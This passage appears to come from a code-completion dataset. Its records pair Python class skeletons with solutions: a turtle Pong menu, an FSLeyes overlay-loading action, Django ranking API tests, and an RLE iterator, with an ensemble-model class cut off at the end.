self.game.ball.moving = True\n if self.game.humans == 1:\n self.game.p2.cpu()\n elif self.game.humans == 0:\n self.game.p1.cpu()\n self.game.p2.cpu()\n self.undo()\n if -5 <= x <= 5 and self.court.height / 2 - self.court.score_height <= y <= self.court.height / 2:\n self.game.pause()\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000476", "length_bytes": 21836, "license_type": "no_license", "methods": [{"docstring": "Initialize game menu", "name": "__init__", "signature": "def __init__(self, game)"}, {"docstring": "Create court border", "name": "border", "signature": "def border(self)"}, {"docstring": "Create play button", "name": "play", "signature": "def play(self)"}, {"docstring": "Create pause button", "name": "pause", "signature": "def pause(self)"}, {"docstring": "Assign menu function on mouse click", "name": "click", "signature": "def click(self, x, y)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_002399", "prompt": "Implement the Python class `Menu` described below.\n\nClass description:\nImplement the Menu class.\n\nMethod signatures and docstrings:\n- def __init__(self, game): Initialize game menu\n- def border(self): Create court border\n- def play(self): Create play button\n- def pause(self): Create pause button\n- def click(self, x, y): Assign menu function on mouse click", "prompted_full_text": "Implement the Python class `Menu` described below.\n\nClass description:\nImplement the Menu class.\n\nMethod signatures and docstrings:\n- def __init__(self, game): Initialize game menu\n- def border(self): Create court border\n- def play(self): Create play button\n- def pause(self): Create pause button\n- def click(self, x, y): Assign menu function on mouse click\n\n<|skeleton|>\nclass Menu:\n\n def __init__(self, game):\n \"\"\"Initialize game menu\"\"\"\n <|body_0|>\n\n def border(self):\n \"\"\"Create court border\"\"\"\n <|body_1|>\n\n def play(self):\n \"\"\"Create play button\"\"\"\n <|body_2|>\n\n def pause(self):\n \"\"\"Create pause button\"\"\"\n <|body_3|>\n\n def click(self, x, y):\n \"\"\"Assign menu function on mouse click\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(visible=False)\n self.color('white')\n self.shape('square')\n self.setheading(90)\n self.shapesize(0.1, 1)\n self.speed(0)\n self.penup()\n self.pensize(3)\n self.game = game\n self.court = self.game.court\n self.court.onscreenclick(self.click)\n self.font_size = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.penup()\n self.goto(-self.court.width, -self.court.height / 2)\n self.pendown()\n self.goto(self.court.width, -self.court.height / 2)\n self.penup()\n self.goto(-self.court.width, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(self.court.width, self.court.height / 2 - self.court.score_height)\n self.penup()\n self.goto(0, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(0, -self.court.height / 2)\n self.penup()\n<|end_body_1|>\n\n<|body_start_2|>\n self.font_size = int(self.court.score_height / 4)\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n<|end_body_2|>\n\n<|body_start_3|>\n self.goto(-5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n self.goto(5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n<|end_body_3|>\n\n<|body_start_4|>\n print(x, y)\n if -self.court.width / 2 <= x <= -self.court.width / 2 + self.court.width / 2 / 10 and self.court.height / 2 - self.court.score_height / 2 <= y <= self.court.height / 2:\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.color('green')\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n self.game.reset()\n self.game.pause_state = False\n self.game.playing()\n self.game.ball.moving = True\n if self.game.humans == 1:\n self.game.p2.cpu()\n elif self.game.humans == 0:\n self.game.p1.cpu()\n self.game.p2.cpu()\n self.undo()\n if -5 <= x <= 5 and self.court.height / 2 - self.court.score_height <= y <= self.court.height / 2:\n self.game.pause()\n<|end_body_4|>\n", "revision_id": "982fb820257a425422305e076dbc4523f591dedb", "skeleton": "<|skeleton|>\nclass Menu:\n\n def __init__(self, game):\n \"\"\"Initialize game menu\"\"\"\n <|body_0|>\n\n def border(self):\n \"\"\"Create court border\"\"\"\n <|body_1|>\n\n def play(self):\n \"\"\"Create play button\"\"\"\n <|body_2|>\n\n def pause(self):\n \"\"\"Create pause button\"\"\"\n <|body_3|>\n\n def click(self, x, y):\n \"\"\"Assign menu function on mouse click\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Menu:\n def __init__(self, game):\n \"\"\"Initialize game menu\"\"\"\n super().__init__(visible=False)\n self.color('white')\n self.shape('square')\n self.setheading(90)\n self.shapesize(0.1, 1)\n self.speed(0)\n self.penup()\n self.pensize(3)\n self.game = game\n self.court = self.game.court\n self.court.onscreenclick(self.click)\n self.font_size = None\n\n def border(self):\n \"\"\"Create court border\"\"\"\n self.penup()\n self.goto(-self.court.width, -self.court.height / 2)\n self.pendown()\n self.goto(self.court.width, -self.court.height / 2)\n self.penup()\n self.goto(-self.court.width, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(self.court.width, self.court.height / 2 - self.court.score_height)\n self.penup()\n self.goto(0, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(0, -self.court.height / 2)\n self.penup()\n\n def play(self):\n \"\"\"Create play button\"\"\"\n self.font_size = int(self.court.score_height / 4)\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n\n def pause(self):\n \"\"\"Create pause button\"\"\"\n self.goto(-5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n self.goto(5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n\n def click(self, x, y):\n \"\"\"Assign menu function on mouse click\"\"\"\n print(x, y)\n if -self.court.width / 2 <= x <= -self.court.width / 2 + self.court.width / 2 / 10 and self.court.height / 2 - self.court.score_height / 2 <= y <= self.court.height / 2:\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.color('green')\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n self.game.reset()\n self.game.pause_state = False\n self.game.playing()\n self.game.ball.moving = True\n if self.game.humans == 1:\n self.game.p2.cpu()\n elif self.game.humans == 0:\n self.game.p1.cpu()\n self.game.p2.cpu()\n self.undo()\n if -5 <= x <= 5 and self.court.height / 2 - self.court.score_height <= y <= self.court.height / 2:\n self.game.pause()\n", "source": "the_stack_v2_python_sparse", "source_path": "07. Turtles/PongGame.py", "source_repo": "pBogey/hello-world", "split": "test", "star_events_count": 0} {"blob_id": "28fdbff0af061fcdc4b58a724418db2d027abc6a", "bodies": ["base.Action.__init__(self, self.__loadOverlay)\nself.__overlayList = overlayList\nself.__displayCtx = displayCtx", "def onLoad(paths, overlays):\n if len(overlays) == 0:\n return\n self.__overlayList.extend(overlays)\n self.__displayCtx.selectedOverlay = self.__displayCtx.overlayOrder[-1]\n if self.__displayCtx.autoDisplay:\n for overlay in overlays:\n autodisplay.autoDisplay(overlay, self.__overlayList, self.__displayCtx)\ninteractiveLoadOverlays(onLoad=onLoad, inmem=self.__displayCtx.loadInMemory)"], "bodies_text": "<|body_start_0|>\n base.Action.__init__(self, self.__loadOverlay)\n self.__overlayList = overlayList\n self.__displayCtx = displayCtx\n<|end_body_0|>\n\n<|body_start_1|>\n def onLoad(paths, overlays):\n if len(overlays) == 0:\n return\n self.__overlayList.extend(overlays)\n self.__displayCtx.selectedOverlay = self.__displayCtx.overlayOrder[-1]\n if self.__displayCtx.autoDisplay:\n for overlay in overlays:\n autodisplay.autoDisplay(overlay, self.__overlayList, self.__displayCtx)\n interactiveLoadOverlays(onLoad=onLoad, inmem=self.__displayCtx.loadInMemory)\n<|end_body_1|>\n", "class_docstring": "The ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.", "class_name": "LoadOverlayAction", "detected_licenses": ["BSD-3-Clause", "CC-BY-3.0", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LoadOverlayAction:\n \"\"\"The ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\"\"\"\n\n def __init__(self, overlayList, displayCtx, frame):\n \"\"\"Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\"\"\"\n <|body_0|>\n\n def __loadOverlay(self):\n \"\"\"Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n base.Action.__init__(self, self.__loadOverlay)\n self.__overlayList = overlayList\n self.__displayCtx = displayCtx\n<|end_body_0|>\n\n<|body_start_1|>\n def onLoad(paths, overlays):\n if len(overlays) == 0:\n return\n self.__overlayList.extend(overlays)\n self.__displayCtx.selectedOverlay = self.__displayCtx.overlayOrder[-1]\n if self.__displayCtx.autoDisplay:\n for overlay in overlays:\n autodisplay.autoDisplay(overlay, self.__overlayList, self.__displayCtx)\n interactiveLoadOverlays(onLoad=onLoad, inmem=self.__displayCtx.loadInMemory)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000477", "length_bytes": 16912, "license_type": "permissive", "methods": [{"docstring": "Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.", "name": "__init__", "signature": "def __init__(self, overlayList, displayCtx, frame)"}, {"docstring": "Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.", "name": "__loadOverlay", "signature": "def __loadOverlay(self)"}], "n_methods": 2, "prompt": "Implement the Python class `LoadOverlayAction` described below.\n\nClass description:\nThe ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\n\nMethod signatures and docstrings:\n- def __init__(self, overlayList, displayCtx, frame): Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\n- def __loadOverlay(self): Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.", "prompted_full_text": "Implement the Python class `LoadOverlayAction` described below.\n\nClass description:\nThe ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\n\nMethod signatures and docstrings:\n- def __init__(self, overlayList, displayCtx, frame): Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\n- def __loadOverlay(self): Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.\n\n<|skeleton|>\nclass LoadOverlayAction:\n \"\"\"The ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\"\"\"\n\n def __init__(self, overlayList, displayCtx, frame):\n \"\"\"Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\"\"\"\n <|body_0|>\n\n def __loadOverlay(self):\n \"\"\"Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n base.Action.__init__(self, self.__loadOverlay)\n self.__overlayList = overlayList\n self.__displayCtx = displayCtx\n<|end_body_0|>\n\n<|body_start_1|>\n def onLoad(paths, overlays):\n if len(overlays) == 0:\n return\n self.__overlayList.extend(overlays)\n self.__displayCtx.selectedOverlay = self.__displayCtx.overlayOrder[-1]\n if self.__displayCtx.autoDisplay:\n for overlay in overlays:\n autodisplay.autoDisplay(overlay, self.__overlayList, self.__displayCtx)\n interactiveLoadOverlays(onLoad=onLoad, inmem=self.__displayCtx.loadInMemory)\n<|end_body_1|>\n", "revision_id": "46ccb4fe2b2346eb57576247f49714032b61307a", "skeleton": "<|skeleton|>\nclass LoadOverlayAction:\n \"\"\"The ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\"\"\"\n\n def __init__(self, overlayList, displayCtx, frame):\n \"\"\"Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\"\"\"\n <|body_0|>\n\n def __loadOverlay(self):\n \"\"\"Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LoadOverlayAction:\n \"\"\"The ``LoadOverlayAction`` allows the user to add files to the :class:`.OverlayList`.\"\"\"\n\n def __init__(self, overlayList, displayCtx, frame):\n \"\"\"Create a ``LoadOverlayAction``. :arg overlayList: The :class:`.OverlayList`. :arg displayCtx: The :class:`.DisplayContext`. :arg frame: The :class:`.FSLeyesFrame`.\"\"\"\n base.Action.__init__(self, self.__loadOverlay)\n self.__overlayList = overlayList\n self.__displayCtx = displayCtx\n\n def __loadOverlay(self):\n \"\"\"Calls :func:`interactiveLoadOverlays`. If overlays were added, updates the :attr:`.DisplayContext.selectedOverlay` accordingly. If :attr:`.DisplayContext.autoDisplay` is ``True``, uses the :mod:`.autodisplay` module to configure the display properties of each new overlay.\"\"\"\n def onLoad(paths, overlays):\n if len(overlays) == 0:\n return\n self.__overlayList.extend(overlays)\n self.__displayCtx.selectedOverlay = self.__displayCtx.overlayOrder[-1]\n if self.__displayCtx.autoDisplay:\n for overlay in overlays:\n autodisplay.autoDisplay(overlay, self.__overlayList, self.__displayCtx)\n interactiveLoadOverlays(onLoad=onLoad, inmem=self.__displayCtx.loadInMemory)\n", "source": "the_stack_v2_python_sparse", "source_path": "fsleyes/actions/loadoverlay.py", "source_repo": "sanjayankur31/fsleyes", "split": "test", "star_events_count": 1} {"blob_id": "5d1fe599a6391946e8f3101eeb4c563d60cd4106", "bodies": ["response = self.client.get('/api/rankings/55')\nself.assertEqual(response.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for too large numbers!{BColors.ENDC}')\nprint(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for too many players.{BColors.ENDC}')\nresponse2 = self.client.get('/api/rankings/-1')\nself.assertEqual(response2.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for negative numers!{BColors.ENDC}')\nprint(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for negative number of players.{BColors.ENDC}')", "response = self.client.get('/api/rankings/2')\nself.assertEqual(response.status_code, 200, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 200!{BColors.ENDC}')\nprint(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct response code for requesting top n players.{BColors.ENDC}')\ntop_n_players = response.data['top_ranking_players']\nn = response.data['n']\nself.assertEqual(n, 2, msg=f'{BColors.FAIL}\\t[-]\\tWrong number of players returned!{BColors.ENDC}')\nprint(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct number of players{BColors.ENDC}')\nfirst_player = top_n_players[0]['points']['llistStandardPoints']['llistSurvivalPoints']\nsecond_player = top_n_players[1]['points']['llistStandardPoints']['llistSurvivalPoints']\nself.assertEquals(first_player >= second_player, True, msg=f'{BColors.FAIL}\\t[-]\\tWrong ordering!{BColors.ENDC}')\nprint(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct ordering of players{BColors.ENDC}')"], "bodies_text": "<|body_start_0|>\n response = self.client.get('/api/rankings/55')\n self.assertEqual(response.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for too large numbers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for too many players.{BColors.ENDC}')\n response2 = self.client.get('/api/rankings/-1')\n self.assertEqual(response2.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for negative numers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for negative number of players.{BColors.ENDC}')\n<|end_body_0|>\n\n<|body_start_1|>\n response = self.client.get('/api/rankings/2')\n self.assertEqual(response.status_code, 200, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 200!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct response code for requesting top n players.{BColors.ENDC}')\n top_n_players = response.data['top_ranking_players']\n n = response.data['n']\n self.assertEqual(n, 2, msg=f'{BColors.FAIL}\\t[-]\\tWrong number of players returned!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct number of players{BColors.ENDC}')\n first_player = top_n_players[0]['points']['llistStandardPoints']['llistSurvivalPoints']\n second_player = top_n_players[1]['points']['llistStandardPoints']['llistSurvivalPoints']\n self.assertEquals(first_player >= second_player, True, msg=f'{BColors.FAIL}\\t[-]\\tWrong ordering!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct ordering of players{BColors.ENDC}')\n<|end_body_1|>\n", "class_docstring": "Tests the API call for getting top n ranking players", "class_name": "Rankings", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Rankings:\n \"\"\"Tests the API call for getting top n ranking players\"\"\"\n\n def test_invalid_api_request(self):\n \"\"\"Invalid API request. Too many or too few players requested\"\"\"\n <|body_0|>\n\n def test_top_n(self):\n \"\"\"Test getting top n players\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n response = self.client.get('/api/rankings/55')\n self.assertEqual(response.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for too large numbers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for too many players.{BColors.ENDC}')\n response2 = self.client.get('/api/rankings/-1')\n self.assertEqual(response2.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for negative numers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for negative number of players.{BColors.ENDC}')\n<|end_body_0|>\n\n<|body_start_1|>\n response = self.client.get('/api/rankings/2')\n self.assertEqual(response.status_code, 200, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 200!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct response code for requesting top n players.{BColors.ENDC}')\n top_n_players = response.data['top_ranking_players']\n n = response.data['n']\n self.assertEqual(n, 2, msg=f'{BColors.FAIL}\\t[-]\\tWrong number of players returned!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct number of players{BColors.ENDC}')\n first_player = top_n_players[0]['points']['llistStandardPoints']['llistSurvivalPoints']\n second_player = top_n_players[1]['points']['llistStandardPoints']['llistSurvivalPoints']\n self.assertEquals(first_player >= second_player, True, msg=f'{BColors.FAIL}\\t[-]\\tWrong ordering!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct ordering of players{BColors.ENDC}')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000478", "length_bytes": 2885, "license_type": "permissive", "methods": [{"docstring": "Invalid API request. Too many or too few players requested", "name": "test_invalid_api_request", "signature": "def test_invalid_api_request(self)"}, {"docstring": "Test getting top n players", "name": "test_top_n", "signature": "def test_top_n(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003871", "prompt": "Implement the Python class `Rankings` described below.\n\nClass description:\nTests the API call for getting top n ranking players\n\nMethod signatures and docstrings:\n- def test_invalid_api_request(self): Invalid API request. Too many or too few players requested\n- def test_top_n(self): Test getting top n players", "prompted_full_text": "Implement the Python class `Rankings` described below.\n\nClass description:\nTests the API call for getting top n ranking players\n\nMethod signatures and docstrings:\n- def test_invalid_api_request(self): Invalid API request. Too many or too few players requested\n- def test_top_n(self): Test getting top n players\n\n<|skeleton|>\nclass Rankings:\n \"\"\"Tests the API call for getting top n ranking players\"\"\"\n\n def test_invalid_api_request(self):\n \"\"\"Invalid API request. Too many or too few players requested\"\"\"\n <|body_0|>\n\n def test_top_n(self):\n \"\"\"Test getting top n players\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n response = self.client.get('/api/rankings/55')\n self.assertEqual(response.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for too large numbers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for too many players.{BColors.ENDC}')\n response2 = self.client.get('/api/rankings/-1')\n self.assertEqual(response2.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for negative numers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for negative number of players.{BColors.ENDC}')\n<|end_body_0|>\n\n<|body_start_1|>\n response = self.client.get('/api/rankings/2')\n self.assertEqual(response.status_code, 200, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 200!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct response code for requesting top n players.{BColors.ENDC}')\n top_n_players = response.data['top_ranking_players']\n n = response.data['n']\n self.assertEqual(n, 2, msg=f'{BColors.FAIL}\\t[-]\\tWrong number of players returned!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct number of players{BColors.ENDC}')\n first_player = top_n_players[0]['points']['llistStandardPoints']['llistSurvivalPoints']\n second_player = top_n_players[1]['points']['llistStandardPoints']['llistSurvivalPoints']\n self.assertEquals(first_player >= second_player, True, msg=f'{BColors.FAIL}\\t[-]\\tWrong ordering!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct ordering of players{BColors.ENDC}')\n<|end_body_1|>\n", "revision_id": "a47c849ea97763eff1005273a58aa3d8ab663ff2", "skeleton": "<|skeleton|>\nclass Rankings:\n \"\"\"Tests the API call for getting top n ranking players\"\"\"\n\n def test_invalid_api_request(self):\n \"\"\"Invalid API request. Too many or too few players requested\"\"\"\n <|body_0|>\n\n def test_top_n(self):\n \"\"\"Test getting top n players\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Rankings:\n \"\"\"Tests the API call for getting top n ranking players\"\"\"\n\n def test_invalid_api_request(self):\n \"\"\"Invalid API request. Too many or too few players requested\"\"\"\n response = self.client.get('/api/rankings/55')\n self.assertEqual(response.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for too large numbers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for too many players.{BColors.ENDC}')\n response2 = self.client.get('/api/rankings/-1')\n self.assertEqual(response2.status_code, 400, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 400 for negative numers!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning the correct response code for negative number of players.{BColors.ENDC}')\n\n def test_top_n(self):\n \"\"\"Test getting top n players\"\"\"\n response = self.client.get('/api/rankings/2')\n self.assertEqual(response.status_code, 200, msg=f'{BColors.FAIL}\\t[-]\\tResponse was not 200!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct response code for requesting top n players.{BColors.ENDC}')\n top_n_players = response.data['top_ranking_players']\n n = response.data['n']\n self.assertEqual(n, 2, msg=f'{BColors.FAIL}\\t[-]\\tWrong number of players returned!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct number of players{BColors.ENDC}')\n first_player = top_n_players[0]['points']['llistStandardPoints']['llistSurvivalPoints']\n second_player = top_n_players[1]['points']['llistStandardPoints']['llistSurvivalPoints']\n self.assertEquals(first_player >= second_player, True, msg=f'{BColors.FAIL}\\t[-]\\tWrong ordering!{BColors.ENDC}')\n print(f'{BColors.OKGREEN}\\t[+]\\tPass returning correct ordering of players{BColors.ENDC}')\n", "source": "the_stack_v2_python_sparse", "source_path": "home_page/api/tests_api.py", "source_repo": "Plongesam/data-structures-game", "split": "test", "star_events_count": 2} {"blob_id": "1da377aae169f5683096ad4e2dc84812f71cfb3b", "bodies": ["self.d = []\nfor i in range(1, len(A), 2):\n for j in range(A[i - 1]):\n self.d.append(A[i])", "if len(self.d) >= n:\n ret = self.d[n - 1]\n self.d = self.d[n:]\nelse:\n ret = -1\n self.d = []\nreturn ret"], "bodies_text": "<|body_start_0|>\n self.d = []\n for i in range(1, len(A), 2):\n for j in range(A[i - 1]):\n self.d.append(A[i])\n<|end_body_0|>\n\n<|body_start_1|>\n if len(self.d) >= n:\n ret = self.d[n - 1]\n self.d = self.d[n:]\n else:\n ret = -1\n self.d = []\n return ret\n<|end_body_1|>\n", "class_docstring": "", "class_name": "RLEIterator", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RLEIterator:\n\n def __init__(self, A):\n \"\"\":type A: List[int]\"\"\"\n <|body_0|>\n\n def next(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.d = []\n for i in range(1, len(A), 2):\n for j in range(A[i - 1]):\n self.d.append(A[i])\n<|end_body_0|>\n\n<|body_start_1|>\n if len(self.d) >= n:\n ret = self.d[n - 1]\n self.d = self.d[n:]\n else:\n ret = -1\n self.d = []\n return ret\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000479", "length_bytes": 628, "license_type": "no_license", "methods": [{"docstring": ":type A: List[int]", "name": "__init__", "signature": "def __init__(self, A)"}, {"docstring": ":type n: int :rtype: int", "name": "next", "signature": "def next(self, n)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002419", "prompt": "Implement the Python class `RLEIterator` described below.\n\nClass description:\nImplement the RLEIterator class.\n\nMethod signatures and docstrings:\n- def __init__(self, A): :type A: List[int]\n- def next(self, n): :type n: int :rtype: int", "prompted_full_text": "Implement the Python class `RLEIterator` described below.\n\nClass description:\nImplement the RLEIterator class.\n\nMethod signatures and docstrings:\n- def __init__(self, A): :type A: List[int]\n- def next(self, n): :type n: int :rtype: int\n\n<|skeleton|>\nclass RLEIterator:\n\n def __init__(self, A):\n \"\"\":type A: List[int]\"\"\"\n <|body_0|>\n\n def next(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.d = []\n for i in range(1, len(A), 2):\n for j in range(A[i - 1]):\n self.d.append(A[i])\n<|end_body_0|>\n\n<|body_start_1|>\n if len(self.d) >= n:\n ret = self.d[n - 1]\n self.d = self.d[n:]\n else:\n ret = -1\n self.d = []\n return ret\n<|end_body_1|>\n", "revision_id": "33e5d12bfd9ed9a49cf55df8bd7c6dd8178ec36d", "skeleton": "<|skeleton|>\nclass RLEIterator:\n\n def __init__(self, A):\n \"\"\":type A: List[int]\"\"\"\n <|body_0|>\n\n def next(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RLEIterator:\n def __init__(self, A):\n \"\"\":type A: List[int]\"\"\"\n self.d = []\n for i in range(1, len(A), 2):\n for j in range(A[i - 1]):\n self.d.append(A[i])\n\n def next(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n if len(self.d) >= n:\n ret = self.d[n - 1]\n self.d = self.d[n:]\n else:\n ret = -1\n self.d = []\n return ret\n", "source": "the_stack_v2_python_sparse", "source_path": "iter.py", "source_repo": "kirihar2/coding-competition", "split": "test", "star_events_count": 0} {"blob_id": "56d0fbb0193432d8084ea39ca535d9394ce8a0e8", "bodies": ["self.use_trigger_channel_model = use_trigger_channel_model\nself.use_action_channel_model = use_action_channel_model\nself.use_trigger_fn_model = use_trigger_fn_model\nself.use_action_fn_model = use_action_fn_model", "args, model_classes = ([], [])\nif self.use_trigger_channel_model:\n args.append(self.t_channel_args)\n model_classes.append(TriggerChannelModel)\nif self.use_action_channel_model:\n args.append(self.a_channel_args)\n model_classes.append(ActionChannelModel)\nif self.use_trigger_fn_model:\n args.append(self.t_fn_args)\n model_classes.append(TriggerFunctionModel)\nif self.use_action_fn_model:\n args.append(self.a_fn_args)\n model_classes.append(ActionFunctionModel)\nensembles = []\nfor arg, model_class in zip(args, model_classes):\n ensembles.append(self.create_ensemble(arg, model_class))\nn = len(ensembles[0].test_data()[0])\nmistakes = np.array([False] * n)\nfor ensemble in ensembles:\n inputs, labels, seq_lens = ensemble.test_data()\n m = ensemble.prediction_mistakes(inputs, labels, seq_lens)\n 